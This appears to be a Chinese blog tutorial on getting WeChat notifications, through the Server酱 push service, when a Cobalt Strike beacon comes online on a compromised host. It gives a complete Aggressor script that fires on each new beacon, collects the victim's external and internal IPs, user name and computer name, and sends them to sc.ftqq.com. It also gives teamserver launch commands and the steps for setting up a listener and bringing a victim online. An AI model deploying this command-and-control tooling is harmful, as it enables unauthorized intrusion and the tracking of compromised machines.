参考列表:
使用Server酱实现Cobalt Strike主机上线微信提醒
利用ServerChan实现CobaltStrike上线微信提醒
Server酱
网站地址:http://sc.ftqq.com/3.version
登录
你需要登录一下这个网站,也可以使用GitHub账号一键登录,然后绑定一下“微信推送”
然后点击“发送消息”做一个测试,确认消息接收正常,旁边的“调用代码”是一会要用到的,复制一下,然后就可以离开页面了。
准备脚本
准备一个名为http_ftqq.cna的脚本,要问为什么,就问Server酱。
把第25行的SCKEY码填上,就是你刚刚复制的那个“调用代码”
# 循环获取所有beacon
on beacon_initial {
sub http_get {
local('$output');
$url = [new java.net.URL: $1];
$stream = [$url openStream];
$handle = [SleepUtils getIOHandle: $stream, $null];
@content = readAll($handle);
foreach $line (@content) {
$output .= $line . "\r\n";
}
println($output);
}
#获取ip、计算机名、登录账号
$externalIP = replace(beacon_info($1, "external"), " ", "_");
$internalIP = replace(beacon_info($1, "internal"), " ", "_");
$userName = replace(beacon_info($1, "user"), " ", "_");
$computerName = replace(beacon_info($1, "computer"), " ", "_");
#get一下Server酱的链接
$url = 'https://sc.ftqq.com/此处填写你Server酱的SCKEY码.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0A%e5%a4%96%e7%bd%91ip:'.$externalIP.'%0D%0A%0D%0A%e5%86%85%e7%bd%91ip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;
http_get($url);
}
Cobalt Strike准备
接下来就是上线一台主机了,你想怎么玩就怎么玩
cs服务器在kali上面启动
sudo chmod +x teamserver
sudo ./teamserver 10.3.139.50 123456
cs客户机在kali上面启动
sudo chmod +x start.sh
./start.sh
加载脚本
新建监听
受害者准备
上线
